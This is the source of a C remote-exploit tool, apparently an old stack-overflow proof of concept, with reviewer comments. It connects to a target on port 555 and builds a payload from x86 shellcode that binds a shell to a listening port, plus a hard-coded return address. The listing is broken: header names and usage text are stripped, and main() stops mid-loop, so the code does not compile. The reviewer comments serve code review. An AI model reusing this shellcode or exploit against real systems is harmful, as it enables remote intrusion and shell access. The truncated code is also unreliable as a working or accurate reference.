/*
 * exploit_probe test tool
 *
 * *** PRIVATE -- DO NOT DISTRIBUTE ***
 *
 * compile with gcc -g -Wall -o exploit_probe exploit_probe.c
 *
 * NOTE(review): this copy was extracted from a rendering that stripped
 * every "<...>" span.  The header names after each #include, the argument
 * placeholders in usage()'s format string, and the tail of main() after
 * "for(i=0; i" are missing; the listing ends mid-loop and does not compile
 * as shown.
 */

/* includes */
/* NOTE(review): header names lost in extraction -- see file header. */
#include
#include
#include
#include
#include
#include
#include
#include
//#include
#include
#include
#if defined (__OpenBSD__) || defined (__NetBSD__)
#include   /* BSD-only header; name also lost in extraction */
#endif

/* defines*/
#define VERSION "1.0"
#define MAXBUF 8192   /* size of the stack buffer built in main() */

// shellcode
/*
 * Raw machine-code bytes.  Per the author's comment they bind a listening
 * port to a shell; they are specific to one architecture/OS ABI and
 * nothing in this tool checks that the target matches.  The two bytes the
 * author marks below are the listen port, stored in network byte order.
 */
char shellcode[]= // binds a port to a shell
"\x31\xc0\x31\xdb\x31\xd2\x50\x6a\x01\x6a\x02\x89\xe1\xfe\xc3\xb0"
"\x66\xcd\x80\x89\xc6\x52\x68\xbb\x02"
"\x11\x5c" // <-- this is the port value
"\x89\xe1\x6a\x10\x51"
"\x56\x89\xe1\xfe\xc3\xb0\x66\xcd\x80\x52\x56\x89\xe1\xb3\x04\xb0"
"\x66\xcd\x80\x52\x52\x56\x89\xe1\xfe\xc3\xb0\x66\xcd\x80\x89\xc3"
"\x31\xc9\xb0\x3f\xcd\x80\x41\xb0\x3f\xcd\x80\x41\xb0\x3f\xcd\x80"
"\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89"
"\xe1\xb0\x0b\xcd\x80";

/*
 * Four-byte little-endian return address (0xbfffed80 as written).
 * Hard-coded; presumably a stack address that depends on the target's
 * build and environment, so it is not expected to be valid generally --
 * TODO confirm where it is used, the consuming code is past the end of
 * this chunk.
 */
char retcode[]="\x80\xed\xff\xbf";

/*
 * Print the command-line usage to stderr.
 *
 * prog: argv[0] of the running process.
 *
 * NOTE(review): the text after "%s" appears to have been stripped in
 * extraction; main() reads argv[1] as the payload size and argv[2] as the
 * host name, so the original most likely listed those two placeholders.
 */
void usage(char *prog)
{
    fprintf(stderr,"USAGE: ");
    fprintf(stderr,"%s \n\n",prog);
}

/* main */
/*
 * Entry point.  Resolves argv[2], opens a TCP connection to it on port
 * 555 and then starts building a payload of argv[1] bytes into `buffer`.
 * The function runs past the end of this chunk; everything after the
 * `for` header is missing here.
 *
 * Review notes on the visible part:
 *  - `size` comes straight from strtol() with no end-pointer or errno
 *    check, and nothing visible bounds it against MAXBUF (8192) before the
 *    payload loop -- verify the loop clamps it, otherwise `buffer` can be
 *    overrun by a large or negative argument.
 *  - socket() is not checked for failure before connect() uses sockfd.
 *  - `address` is never zeroed, so sin_zero holds stack garbage.
 *  - j, k and ch are declared but unused in the visible portion.
 *  - exit(-1) yields process status 255, not -1.
 */
int main(int argc, char **argv)
{
    int i=0, j=0, k=0;
    struct sockaddr_in address;
    struct hostent *hp;
    int result = 1;
    char ch;
    int sockfd;
    int size;
    char *prog;
    char buffer[MAXBUF];   /* payload staging area; see MAXBUF note above */

    prog = argv[0];
    printf("Remote Exploit Test Tool, v%s\n",VERSION);
    printf("Simple Nomad \n\n");   /* contact text after the name lost in extraction */

    if(argc <= 2) {
        usage(prog);
        exit(-1);
    }
    /* NOTE(review): unvalidated -- no end pointer, no range check vs MAXBUF. */
    size = (int)strtol(argv[1],NULL,10);
    /* gethostbyname() is obsolete and not thread-safe; only the first
     * resolved address (h_addr_list[0]) is used below. */
    hp = gethostbyname(argv[2]);
    if (hp == NULL) {
        printf("Unable to resolve %s, unknown host\n", argv[2]);
        exit(-1);
    }
    /* NOTE(review): return value unchecked; a failed socket() (-1) is
     * passed straight to connect(). */
    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    address.sin_family = AF_INET;
    address.sin_addr = *(struct in_addr *)*hp->h_addr_list;   /* first address only */
    address.sin_port = htons(555); // tcp port   (hard-coded target port)
    printf("[+] Connecting to host\n");
    result = connect(sockfd, (struct sockaddr *)&address, sizeof(address));
    if (result == -1) {
        printf("[!] Unable to connect to server %s\n",argv[2]);
        exit(1);
    }
    printf("[+] Connected\n");
    printf("[+] Building payload of %d length\n",size);
    /* Loop header truncated here; the body and the rest of main() lie
     * outside this chunk. */
    for(i=0; i